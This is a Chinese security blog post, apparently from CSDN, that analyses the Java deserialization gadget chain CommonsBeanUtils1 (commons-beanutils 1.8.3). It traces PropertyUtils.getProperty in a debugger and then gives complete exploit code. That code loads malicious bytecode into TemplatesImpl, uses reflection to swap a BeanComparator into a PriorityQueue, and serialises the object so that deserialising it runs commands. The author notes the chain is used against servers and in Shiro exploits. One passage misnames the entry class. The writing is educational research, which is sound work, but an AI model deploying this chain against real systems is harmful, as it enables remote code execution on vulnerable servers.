Java反序列化-CommonsBeanUtils 1链分析

最新推荐文章于 2024-07-22 14:15:06 发布
最新推荐文章于 2024-07-22 14:15:06 发布
阅读量1.1k 收藏 17
点赞数 23
分类专栏: Java安全 # Java反序列化-CC链 文章标签: java python 开发语言 Java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53912233/article/details/138661173
版权

环境搭建

        <dependency>
            <groupId>commons-beanutils</groupId>
            <artifactId>commons-beanutils</artifactId>
            <version>1.8.3</version>
        </dependency>

image.png

什么是JavaBean

符合这种定义的 class 叫做JavaBean

//读方法
public Type getHz()

//写方法:
public void setHz(Type value)

演示

Person.java代码:

package CB;

public class Person {
    private String name;
    private int age;

    public Person(String name,int age){
        this.name = name;
        this.age = age;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }
}

主程序代码 Bean.java:

package CB;

import org.apache.commons.beanutils.PropertyUtils;

public class Bean {
    public static void main(String[] args) throws Exception {
        Person person = new Person("cike_y",18);
        System.out.println(PropertyUtils.getProperty(person,"age"));
    }
}

运行代码之后可以看见,输出了 age变量
image.png
它相当于调用 Person类的 getAge方法
image.png

CB1链原理

断点分析 getProperty

我们已经知道了,只要符合 JavaBean格式的class,都可以调用这个 PropertyUtils类的这个getProperty方法。所以现在我们可以断掉调试一下。
image.png
点击去 getProperty方法看一下调用过程
image.png
然后来到这里,然后按F7
image.png
这里也调用了 getProperty,点进去看一下
image.png
然后来到了这里,可以看见调用了 getNestedProperty 方法
image.png
继续按 F7 来到了 getNestedProperty 方法的具体构造。这些是 判断 bean 是否为空,不用管
image.png
然后直到来到这里,按F7
image.png
然后 按F8来到这里,可以看见是之前熟悉的 反射以及调用
image.png
可以发现 之前的属性变量age 首字母变成了大写 Age,然后自动加上了 get 拼接 Age 变成了 getAge方法。
这个时候就能理解为什么调用这个方法的时候会自动调用 Person中的 getAge()方法进行读取
image.png
最后再进行反射调用,读取的方法,以及对象类型
image.png
最后再返回内容
image.png
image.png

getProperty的利用

通过断点分析,我们知道了,getProperty方法会将 name属性值的命名结构改为驼峰格式
image.png
所以我们需要找能够加载恶意字节码或者命令执行的一个类的方法,用这种方式进行调用
image.png
实际上 TemplatesImpl 类中 getOutputProperties这个方法刚好符合这个结构,而且前面是get字符串,也调用了之前CC3链中的 用过的newTransformer方法,这个方法可以加载我们恶意的字节码,从而达到命令执行。

CB1链子构造

CC3尾部链拼接getProperty

我们知道了 getOutputProperties方法调用了 newTransformer,那么我们就可以将之前CC3的尾部链放进来进行拼接构造链子。
exp代码构造:

package CB;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.PropertyUtils;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Bean {
    public static void main(String[] args) throws Exception {
//        Person person = new Person("cike_y",18);
//        System.out.println(PropertyUtils.getProperty(person,"age"));


        //CC3尾部链
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> c = templates.getClass();
        Field name = c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecodes = c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {eval};
        bytecodes.set(templates,codes);

        Field tfactory = c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

//CB1中的getProperty调用getOutputProperties方法,从而调用 newTransformer,然后加载字节码
        PropertyUtils.getProperty(templates,"outputProperties");

    }
}

可以看见命令执行成功
image.png

入口链的寻找

我们的目的是反序列化的时候执行代码,我们需要寻找 谁调用了 getProperty这个方法。
image.png
可以看见这里有一个很熟悉的方法,是CC2中的 利用过的compare 方法,需要使用优先队列。
image.png
这是CC2的流程图
image.png
我们可以去 PriorityQueue类的 readObject方法看一下怎么调用 compare方法的
image.png
然后点进这个函数
image.png
再点进这个函数
image.png
可以发现,PriorityQueue类的readObject方法调用了 compare方法
image.png
至此我们分析到了 入口链是 PropertyUtils类,这个类的readObject方法调用了 compare方法,当我们反序列化的时候会自动调用。
所以构造链如下:

PropertyUtils类反序列化的时候调用compare ->  PropertyUtils.getProperty -> 
-> TemplatesImpl.getOutputProperties -> TemplatesImpl.newTransformer -> 
TemplatesImpl.getTransletInstance -> 恶意字节码

CB1链exp代码构造

我们现在知道CB1的链子流程了,从而构造exp代码:

package CB;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class Bean {
    public static void main(String[] args) throws Exception {

        //CC3尾部链
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> c = templates.getClass();
        Field name = c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecodes = c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {eval};
        bytecodes.set(templates,codes);

        Field tfactory = c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

        BeanComparator beanComparator = new BeanComparator("outputProperties");


        //CC2 部分的 优先队列

        priorityQueue.add(templates);
        priorityQueue.add(1);

        Class<? extends PriorityQueue> pc = priorityQueue.getClass();
        Field comparator = pc.getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(priorityQueue,beanComparator);


        serialize(priorityQueue);
        unserialize("ser.bin");

    }

    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }


}

可以看见命令执行成功
image.png

总结

这个链子打服务器的时候,比如服务器使用的是 1.8.3,那么反序列化构造链的时候版本也要对的上,否则会出现报错什么的。这条链子是一个比较重要的链子,后续的shiro框架漏洞都会用到。

cike_y
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
commons-beanutils-1.9.3
10-27
BeanUtils工具由Apache软件基金组织编写,提供给我们使用,主要解决的问题是:把对象的属性数据封装到对象中。在整个J2EE的编程过程中,我们经常会从各种配置文件中读取相应的数据,需要明白的一点是从配置文件中读取到的数据都是String,但是很显然我们的应用程序中不仅仅有String一种数据类型,比如:基本数据类型(int、double、char、float等),还有自定义数据类型(引用数据类型),那么我们必须面临的一个问题就是讲字符串类型转换为各种具体的数据类型,就是用beanutils工具
Java反序列化漏洞——CommonsBeanutils1链分析
Thunderclap的博客
02-20 1493
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用链中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
[Java反序列化]CommonsBeanutils1利用链学习
snowlyzz的博客
12-07 709
CommonsBeanutils1 shiro依赖反序列化分析
java--CommonsBeanutils1 学习
zyer
06-07 420
CommonsBeanutils1利用链学习
java安全CommonsBeanUtils1
leekos的博客,分享web安全相关知识~
08-02 1158
在之前我们学习了,它是java中的一个优先队列,队列的每个元素都有优先级,在反序列化这个对象的时候,为了保证队列顺序,会将队列中的元素进行排序,从而调用了接口的compare()方法,进而执行恶意反序列化操作我们能不能找到除了之前提到的类以外的其他可以利用的对象?我们需要了解一下。
CommonsBeanutils1反序列化链分析
12-04 925
CommonsBeanutils1反序列化链分析
beanshell 反序列化
01-26 417
beanshell 反序列化 依赖 <dependency> <groupId>org.beanshell</groupId> <artifactId>bsh</artifactId> <version>2.0b5</version> </dependency> Gadget /* * Gadget: * PriorityQueue#readObject * XThis
【Web】Java反序列化之CB1链花样调TemplatesImpl打Shiro
uuzeray的博客
03-02 1191
如果 this.property 不为空,则用 PropertyUtils.getProperty 分别取传入的两个对象的 this.property 属性,而this.property是在BeanComparator的构造方法处传入的(也可以用反射来操作),完全可控。当o1/o2是一个 TemplatesImpl 对象时,property 的值为 outputProperties 时,我们就可调用TemplatesImpl#getOutputProperties(),完成攻击链的调用。
Java反序列化Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1463
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
CommonsBeanutils
Christ1na的博客
10-14 3868
Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 梳理一下流程,首先反序列化入口PriorityQueue类中我们可以调用任意对象的compare方法,而我们要调用的这个compare方法中,最终要调用至PropertyUtils.getProperty方法,进而调用TemplatesImpl利用链。
commons-beanutils-1.9.1解析javaBean方式
05-17
Beanutils用了魔术般的反射技术,实现了很多夸张有用的功能,都是C/C++时代不敢想的。无论谁的项目,始终一天都会用得上它。我算是后知后觉了,第一回看到它的时候居然错过。 1.属性的动态getter,setter 2.beanCompartor 动态排序 3.Converter 把Request或ResultSet中的字符串绑定到对象的属性 4.1 PropertyUtils,当属性为Collection,Map时的动态读取 4.2 PropertyUtils,获取属性的Class类型 4.3 ConstructorUtils,动态创建对象 4.4 MethodUtils,动态调用方法 4.5 动态Bean 见用DynaBean减除不必要的VO和FormBean
介绍一个好用的工具类库commons-beanutils
wq1030的专栏
04-06 893
转自: http://www.blogjava.net/rongxh7/archive/2009/06/22/283566.html   commons-beanutils.jar可以到Apache官网的commons子项目下找到它,或者,在Struts2,Spring的下载包中也能看到它的影子。单独使用时,要多引进一个commons-logging.jar,这个包也是非常见的,...
BeanShell
xiaoyu714543065的专栏
09-01 9692
简介:  BeanShell是一种完全符合Java语法规范的脚本语言,并且又拥有自己的一些语法和方法;  BeanShell是一种松散类型的脚本语言(这点和JS类似)  BeanShell是用Java写成的,一个小型的、免费的、可以下载的、嵌入式的Java源代码解释器,  具有对象脚本语言特性,非常精简的解释器jar文件大小为175k。  BeanShell执行标准Java语句和表达式,
commons-beanutils.jar详解
苦丁茶
11-06 3436
1、BeanUtils最核心的好处在于:我们在编码时,并不需要知道我们处理的JavaBeans具体是什么类型,有哪些属性,这些信息是可以动态获取的,甚至我们都可以不必去关心事实上是否存在这样一个具体的JavaBean类。我们只需要知道有一个JavaBean的实例,我们需要从中取得某个属性,设定某个属性的值,或者仅仅是需要一个属性表。要做到这些,依靠Sun提供的JavaBean规范似乎找不到一个很直
Java反序列化个人总结
mafucan的博客
06-07 537
java的基本使用,差不多忘完了,回忆一下 找到对应的文件夹,cd 先 javac xxx 建立一个class类 再直接 java xxx 完成 首先开始概念 Java序列化与反序列化 序列化是将对象状态转换为可保持或传输的格式的过程。与序列化相对的是反序列化,它将流转换为对象。 这两个过程结合起来,可以轻松地存储和传输数据,这就是序列化的意义所在。 在java中,主要通过ObjectOutputStream中的writeObject()方法对对象进行序列化操作,ObjectInputStream 中的re
commons-beanutils
durenniu的博客
08-12 2289
内省(了解) 内省的目标是得到JavaBean属性的读、写方法的反射对象,通过反射对JavaBean属性进行操作的一组API。例如User类有名为username的JavaBean属性,通过两个Method对象(一个是getUsenrmae(),一个是setUsername())来操作User对象。 如果你还不能理解内省是什么,那么我们通过一个问题来了解内省的作用。现在我们有一个Map,内容如...
12. Hibernate 模板设计模式
最新发布
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 481
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值